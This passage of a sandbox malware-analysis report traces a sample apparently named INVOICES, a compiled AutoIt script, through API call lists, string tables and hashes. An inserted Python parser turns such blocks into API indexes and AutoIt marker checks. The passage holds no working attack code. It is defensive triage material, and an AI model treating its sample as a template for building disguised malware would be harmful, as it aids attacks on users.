                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                  • Opcode ID: 1c1ddb671d4c5756701fce76febf506e0877af5c4d2e7d812f400855111bcdeb
                                                                                                                                  • Instruction ID: f951b0f93097b93ca15bab064161d3f2f9d034bd6668020adad16212d0a12485
                                                                                                                                  • Opcode Fuzzy Hash: 1c1ddb671d4c5756701fce76febf506e0877af5c4d2e7d812f400855111bcdeb
                                                                                                                                  • Instruction Fuzzy Hash: 49029171900109EFDB14DF68CC89EAE7BB9FF49710F108659F905AB2A1DB78AD01CB64
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,007BF910), ref: 007B3690
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 007B36B4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                  • API String ID: 4105515805-45149045
                                                                                                                                  • Opcode ID: f125729726aa569225ec7d75dc1ae6b73e3001b15883c02c8e222877f4145bc2
                                                                                                                                  • Instruction ID: 90a8c36e05197c947a9021bdd3c1329f031a3c0aafb23abd8f84941d289d5d98
                                                                                                                                  • Opcode Fuzzy Hash: f125729726aa569225ec7d75dc1ae6b73e3001b15883c02c8e222877f4145bc2
                                                                                                                                  • Instruction Fuzzy Hash: 58D1A270204301DBCB14EF14C895BEA77A5AF95344F148568F9865B3A3CB7CEE8ACB91
                                                                                                                                  APIs
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 007BA662
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 007BA693
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 007BA69F
                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 007BA6B9
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 007BA6C8
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 007BA6F3
                                                                                                                                  • GetSysColor.USER32(00000010), ref: 007BA6FB
                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 007BA702
                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 007BA711
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007BA718
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 007BA763
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 007BA795
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BA7C0
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColor.USER32(00000012), ref: 007BA935
                                                                                                                                    • Part of subcall function 007BA8FC: SetTextColor.GDI32(?,?), ref: 007BA939
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColorBrush.USER32(0000000F), ref: 007BA94F
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColor.USER32(0000000F), ref: 007BA95A
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColor.USER32(00000011), ref: 007BA977
                                                                                                                                    • Part of subcall function 007BA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007BA985
                                                                                                                                    • Part of subcall function 007BA8FC: SelectObject.GDI32(?,00000000), ref: 007BA996
                                                                                                                                    • Part of subcall function 007BA8FC: SetBkColor.GDI32(?,00000000), ref: 007BA99F
                                                                                                                                    • Part of subcall function 007BA8FC: SelectObject.GDI32(?,?), ref: 007BA9AC
                                                                                                                                    • Part of subcall function 007BA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 007BA9CB
                                                                                                                                    • Part of subcall function 007BA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007BA9E2
                                                                                                                                    • Part of subcall function 007BA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 007BA9F7
                                                                                                                                    • Part of subcall function 007BA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007BAA1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                  • Opcode ID: 82afd59a4a6d0beb75e76a70c21e2759c61025f0ac03cec24c2fb40971889aaa
                                                                                                                                  • Instruction ID: 78c9a144ded88ecc9d9865a6fe82433a01ed6d71a6e55f32265af97f1a1befd5
                                                                                                                                  • Opcode Fuzzy Hash: 82afd59a4a6d0beb75e76a70c21e2759c61025f0ac03cec24c2fb40971889aaa
                                                                                                                                  • Instruction Fuzzy Hash: BE915A72408305FFC711AF68DC08F9A7BA9FF88721F108B29F962961A0D779D944CB56
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 007A75F3
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007A76B2
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007A76F0
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007A7702
                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007A7748
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 007A7754
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007A7798
                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007A77A7
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 007A77B7
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 007A77BB
                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007A77CB
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A77D4
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 007A77DD
                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007A7809
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 007A7820
                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007A785B
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007A786F
                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 007A7880
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007A78B0
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 007A78BB
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007A78C6
                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007A78D0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                  • Opcode ID: cb4859d0f58e52c02c8ee293a7dd064ce6eb12bff1ab8b70533ea17946f8ca6a
                                                                                                                                  • Instruction ID: 3a92e27968fd778ab0b84d118d700dabef5a5e86af1420f6b20942030fbd0aa7
                                                                                                                                  • Opcode Fuzzy Hash: cb4859d0f58e52c02c8ee293a7dd064ce6eb12bff1ab8b70533ea17946f8ca6a
                                                                                                                                  • Instruction Fuzzy Hash: 95A175B1640619BFEB14DF68DC4AFAE7BB9EB45710F008214FA15A72E1D778AD00CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0079ADAA
• GetDriveTypeW.KERNEL32(?,007BFAC0,?,\\.\,007BF910), ref: 0079AE87
• SetErrorMode.KERNEL32(00000000,007BFAC0,?,\\.\,007BF910), ref: 0079AFE5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 14f4cc08fbf6c434528c8f5ddd7719edee7ea6d0269fc78f7e984e013c418902
• Instruction ID: 90c43f7ddd1500f4c5ef99e676497f73c5a2c327bd2a2cbb954e6e9653cee83e
• Opcode Fuzzy Hash: 14f4cc08fbf6c434528c8f5ddd7719edee7ea6d0269fc78f7e984e013c418902
• Instruction Fuzzy Hash: EC51A3F464A205FBCF44DB11E9869BDB372AB08700B208566F90AA7291CB7CDD01DBD3
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: 10b9e1d2edd647e810b08cdebb30af7509a543bd0e7856228187ea1398a3e810
• Instruction ID: c362627c42ce256a8295b02337f106684775c3ff6f952a4727c6aa0bec1d179e
• Opcode Fuzzy Hash: 10b9e1d2edd647e810b08cdebb30af7509a543bd0e7856228187ea1398a3e810
• Instruction Fuzzy Hash: 2B814BF1600215FAEB24AF24CC86FEF7768AF10701F148024FD45AA1D3EBADDA15C6A1
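The function blocks above are the raw material a triager works from: the drive-type block (SetErrorMode / GetDriveTypeW with the `\\.\` and bus-type string table) and the `__wcsnicmp` block whose string table is the AutoIt preprocessor directive list (`#include`, `#requireadmin`, `#notrayicon`, `#OnAutoItStartRegister`, ...), which is what backs the "compiled AutoIt script" verdict. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses this block format (assumed here: every function block opens with an `APIs` header, call lines are `• Api.MODULE(args), ref: ADDR`, similarity fields are `• Key: value`, string tables are `$`-separated) into per-function API lists and string tables, builds a `MODULE!Api -> call sites` index, and flags blocks carrying AutoIt markers. The marker set is the AutoIt directive list plus the `AutoIt v3` banner; the sample text is constructed from entries on this page.

```python
"""Parse Joe Sandbox per-function analysis blocks (added example, not report code).

Assumed block layout (matches the text on this page):
  APIs                                   <- opens a function block
  • Api.MODULE(args), ref: ADDR          <- one call site
    • Part of subcall function X: ...    <- call made inside a callee
  • _memset.LIBCMT ref: ADDR             <- CRT entry, no argument list
  Similarity
  • String ID: a$b$c                     <- '$'-separated string table
  • Opcode ID: ...                       <- other key/value metadata
"""
import re
from dataclasses import dataclass, field
from typing import Optional

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# AutoIt preprocessor directives (AutoIt language reference) plus the banner
# string the compiled interpreter stub carries.
AUTOIT_MARKERS = {
    "#include", "#include-once", "#requireadmin", "#notrayicon", "#pragma compile",
    "#OnAutoItStartRegister", "#cs", "#ce", "#comments-start", "#comments-end",
    "AutoIt v3",
}


@dataclass
class ApiCall:
    module: str
    name: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set when the call sits in a callee


@dataclass
class FuncBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Opcode ID, Instruction Fuzzy Hash, ...


def parse_blocks(text: str) -> list:
    """Split the dump into FuncBlocks; memory-dump file paths are dropped."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = FuncBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["module"], m["name"], args, m["ref"].upper(), m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            key, val = m["key"], m["val"].strip()
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            elif key not in ("Source File", "Associated", "Snapshot File"):
                cur.meta[key] = val
    return blocks


def autoit_marker_hits(blocks: list) -> list:
    """Indices of blocks whose string table contains an AutoIt directive or banner."""
    return [i for i, b in enumerate(blocks) if AUTOIT_MARKERS.intersection(b.strings)]


def api_index(blocks: list) -> dict:
    """'MODULE!Api' -> sorted call-site addresses over all blocks."""
    idx = {}
    for b in blocks:
        for c in b.apis:
            idx.setdefault(f"{c.module}!{c.name}", set()).add(c.ref)
    return {k: sorted(v) for k, v in sorted(idx.items())}


# Constructed sample: trimmed copies of four blocks from this report.
SAMPLE = r"""
APIs
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007A78D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• Opcode ID: cb4859d0f58e52c02c8ee293a7dd064ce6eb12bff1ab8b70533ea17946f8ca6a
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0079ADAA
• GetDriveTypeW.KERNEL32(?,007BFAC0,?,\\.\,007BF910), ref: 0079AE87
• SetErrorMode.KERNEL32(00000000,007BFAC0,?,\\.\,007BF910), ref: 0079AFE5
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0076C5BB
  • Part of subcall function 00731B41: InvalidateRect.USER32(?,00000000,00000001,?), ref: 00731B9A
• _memset.LIBCMT ref: 007B8C76
• String ID: 0
"""

if __name__ == "__main__":
    bl = parse_blocks(SAMPLE)
    print(f"{len(bl)} blocks; AutoIt markers in blocks {autoit_marker_hits(bl)}")
    for k, refs in api_index(bl).items():
        print(f"{k:28s} {' '.join(refs)}")
```

Fed the whole report text instead of the sample, the API index gives a quick view of which imports the dump actually reaches and from how many call sites, and the marker check lets you confirm the AutoIt verdict from the string tables rather than from the "Binary is likely a compiled AutoIt script" signature alone.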
APIs
• DestroyWindow.USER32(?,?,?), ref: 00732CA2
• DeleteObject.GDI32(00000000), ref: 00732CE8
• DeleteObject.GDI32(00000000), ref: 00732CF3
• DestroyCursor.USER32(00000000), ref: 00732CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00732D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0076C5BB
• 6FAA0200.COMCTL32(?,000000FF,?), ref: 0076C5F4
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0076CA1D
  • Part of subcall function 00731B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00732036,?,00000000,?,?,?,?,007316CB,00000000,?), ref: 00731B9A
• SendMessageW.USER32(?,00001053), ref: 0076CA5A
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0076CA71
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
• String ID: 0
• API String ID: 377055139-4108050209
• Opcode ID: 8b7d134314e345f68852caf4a83049ee2a56930e13a8d2b4265051ec7abcd3ad
• Instruction ID: df27c2fe639e1b6f0b0a263d203369b2ec1a38b8510138b9a66c1fe7c80ea3d0
• Opcode Fuzzy Hash: 8b7d134314e345f68852caf4a83049ee2a56930e13a8d2b4265051ec7abcd3ad
• Instruction Fuzzy Hash: BF126D30600201EFDB26CF24C888BB9B7A5FF05710F548569E996DB263C739EC52DBA1
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007B9B04
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007B9BBD
• SendMessageW.USER32(?,00001102,00000002,?), ref: 007B9BD9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
• Opcode ID: 7ab296135b204df3efb328d3c8ece4feb98ea671993b797650cdd88d83d69b2e
• Instruction ID: c12bc79527bb28811a8c99871da5a2f37bf172a7dda5cba96c5936d0e8335991
• Opcode Fuzzy Hash: 7ab296135b204df3efb328d3c8ece4feb98ea671993b797650cdd88d83d69b2e
• Instruction Fuzzy Hash: C4029C31108201AFE7258F24C849BEABBE5FF49714F04862DFBA5D62A1D73CD944CB92
APIs
• GetSysColor.USER32(00000012), ref: 007BA935
• SetTextColor.GDI32(?,?), ref: 007BA939
• GetSysColorBrush.USER32(0000000F), ref: 007BA94F
• GetSysColor.USER32(0000000F), ref: 007BA95A
• CreateSolidBrush.GDI32(?), ref: 007BA95F
• GetSysColor.USER32(00000011), ref: 007BA977
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 007BA985
• SelectObject.GDI32(?,00000000), ref: 007BA996
• SetBkColor.GDI32(?,00000000), ref: 007BA99F
• SelectObject.GDI32(?,?), ref: 007BA9AC
• InflateRect.USER32(?,000000FF,000000FF), ref: 007BA9CB
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007BA9E2
• GetWindowLongW.USER32(00000000,000000F0), ref: 007BA9F7
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007BAA1F
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007BAA46
• InflateRect.USER32(?,000000FD,000000FD), ref: 007BAA64
• DrawFocusRect.USER32(?,?), ref: 007BAA6F
• GetSysColor.USER32(00000011), ref: 007BAA7D
• SetTextColor.GDI32(?,00000000), ref: 007BAA85
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007BAA99
• SelectObject.GDI32(?,007BA62C), ref: 007BAAB0
• DeleteObject.GDI32(?), ref: 007BAABB
• SelectObject.GDI32(?,?), ref: 007BAAC1
• DeleteObject.GDI32(?), ref: 007BAAC6
• SetTextColor.GDI32(?,?), ref: 007BAACC
• SetBkColor.GDI32(?,?), ref: 007BAAD6
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: fdf8c389cb7ea704b5ba52c3de29f7e68b3daa333739632763fae60baf5ce9ab
• Instruction ID: f2ab8b3d434b16af9e81a63d555980a9a7eeff91a50d0e7d99085beff04876b3
• Opcode Fuzzy Hash: fdf8c389cb7ea704b5ba52c3de29f7e68b3daa333739632763fae60baf5ce9ab
• Instruction Fuzzy Hash: 3F510C71900208FFDB11AFA8DC48FEE7B79EF48720F118625F911AA2A1D6799940DF54
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007B8AF3
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007B8B04
• CharNextW.USER32(0000014E), ref: 007B8B33
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007B8B74
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007B8B8A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007B8B9B
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007B8BB8
• SetWindowTextW.USER32(?,0000014E), ref: 007B8C0A
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007B8C20
• SendMessageW.USER32(?,00001002,00000000,?), ref: 007B8C51
• _memset.LIBCMT ref: 007B8C76
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007B8CBF
                                                                                                                                  • _memset.LIBCMT ref: 007B8D1E
                                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007B8D48
                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 007B8DA0
                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 007B8E4D
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 007B8E6F
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B8EB9
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B8EE6
                                                                                                                                  • DrawMenuBar.USER32(?), ref: 007B8EF5
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 007B8F1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
